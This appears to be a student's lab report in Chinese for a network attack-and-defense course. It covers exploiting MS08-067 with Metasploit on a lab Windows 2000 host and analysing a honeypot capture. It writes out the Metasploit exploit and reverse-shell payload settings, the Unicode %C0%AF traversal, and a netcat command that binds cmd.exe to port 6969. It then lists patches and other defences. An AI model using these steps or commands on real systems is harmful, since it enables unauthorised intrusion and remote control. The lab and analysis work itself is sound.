20253914 2025-2026-2 《网络攻防实践》第6周作业

一、实践内容

  1. 学习并使用 Metasploit windows attacker
    Metasploit Windows Attacker 是指利用 Metasploit Framework (MSF) 对 Windows 系统进行渗透攻击的过程与技术集合。它是渗透测试中最常用的工具链之一,通过模块化、自动化的方式实现从漏洞探测到权限控制的全流程攻击。
  2. 学习并解码NT系统破解攻击
    NT 系统一般指 Windows NT 内核系列,包括 Windows NT/2000/XP/7/10/11、Server 2003~2025 等。通常指绕过登录密码、获取系统权限、破解 SAM 数据库等针对 Windows NT 安全机制的攻击手段。
  3. 学习并尝试windows系统远程渗透攻击和分析
    指通过网络远程,利用 Windows 系统漏洞、弱口令、服务缺陷等,未授权入侵目标主机,获取控制权、数据或权限的攻击行为。

二、实践过程

(一)任务一

  1. 在kali输入 msfconsole,并通过search ms08_067搜索漏洞
    image
  2. 通过use windows/smb/ms08_067_netapi 进入漏洞工作目录,并使用show payloads 显示漏洞载荷
    image

输入命令 set payload generic/shell_reverse_tcp 设置载荷。
输入命令 set RHOST 192.168.200.20 设置win2k地址
输入命令 set LHOST 192.168.200.10 设置kali地址
输入exploit,发动攻击
image
4. 使用wireshark监控,并控制win2k做出操作
image

(二)任务二

使用wireshark打开解压后的文件,输入ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106筛选出数据包
image
首次在第117数据包中发现%C0%AF,
%C0%AF 是 /(斜杠)的非法超长 UTF-8 编码,且常与 ../ 组合用于目录穿越,而 boot.ini 是 Windows 标志性系统文件,属于典型攻击目标
因此 推测攻击者在利用Unicode攻击访问boot.ini文件
image
在140数据包中可以发现攻击者想要获得msadcs.dll文件
image
在查看第149数据包时,发现SQL注入攻击:根据“ADM!ROX!YOUR!WORLD”特征字符串以及dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb的使用,可以推测出该攻击是由 msadc2.pl渗透攻击代码发起的
image
通过后续数据包,发现攻击者多次使用不同的密码,企图连接,但未成功
image
继续检查后面的数据包,发现攻击者猜对了密码,成功建立了FTP连接
image
继续检查发现,发现攻击者构建了远程 shell 通道。然后利用命令cmd1.exe /c nc -l -p 6969 -e cmd1.exe,使得攻击者连接 6969 端口,获得了访问权,并进入了交互式控制阶段。
image
锁定6969,查看其做了哪些操作
image
有dir,del ftpcom,type readme.e,net session >>yay3.txt等操作
image
能够在后面的数据包中读出,攻击者已发现是蜜罐
image
防范 MS08-067 漏洞攻击:

  • 及时安装微软官方补丁 KB958644;
  • 关闭 TCP 445、139 等危险端口;
  • 启用并配置系统防火墙;
  • 停止不必要的 Server 服务;
  • 及时升级或停用已停止支持的老旧 Windows 系统。

防范 Unicode 目录遍历攻击

  • 及时安装微软针对 IIS Unicode 漏洞的安全补丁,从根本修复解码漏洞。
  • 严格配置网站目录权限,禁止 Web 进程访问系统盘和敏感目录。
  • 在服务器端对用户输入的 URL 进行过滤,拦截包含 % c0% af 等异常编码的恶意字符。
  • 关闭不必要的 IIS 目录浏览功能,限制路径遍历行为。
  • 使用防火墙或 WAF 检测并阻断包含 Unicode 恶意编码的请求。
  • 升级服务器系统和 Web 服务版本,避免使用存在历史编码漏洞的旧组件。

(三)任务三

攻击方信息:kali,使用MS08-067 漏洞,ip地址为192.168.200.10
攻击方:使用kali攻击win2k,其操作与任务一相同,具体配置为
image
使用exploit发动攻击
image
创建文件夹操作
image
可以看到靶机已创建文件夹
image
防守方:打开wireshark
能够追踪到攻击方进行的操作
image

三、学习中遇到的问题及解决

  • 问题1:任务一中实验始终无法解决
    660f1cd001d90e542a2b9eac51ee649f
  • 问题1解决方案:重装win2k,解决

四、实践总结

通过学习 Windows 远程渗透、NT 系统破解与 Metasploit 相关知识,我深刻认识到系统安全的重要性。了解了常见攻击流程、漏洞利用方式及密码破解原理,掌握了基本的渗透思路与安全分析方法。同时也树立了牢固的法律与安全意识,明白这些技术只能用于合法防护与学习。今后我会更加重视系统加固、补丁更新和权限管理,提升安全防护能力,做到知攻善防,规范使用技术,守护网络安全。

posted @ 2026-04-23 07:43  你泽哥  阅读(22)  评论(0)    收藏  举报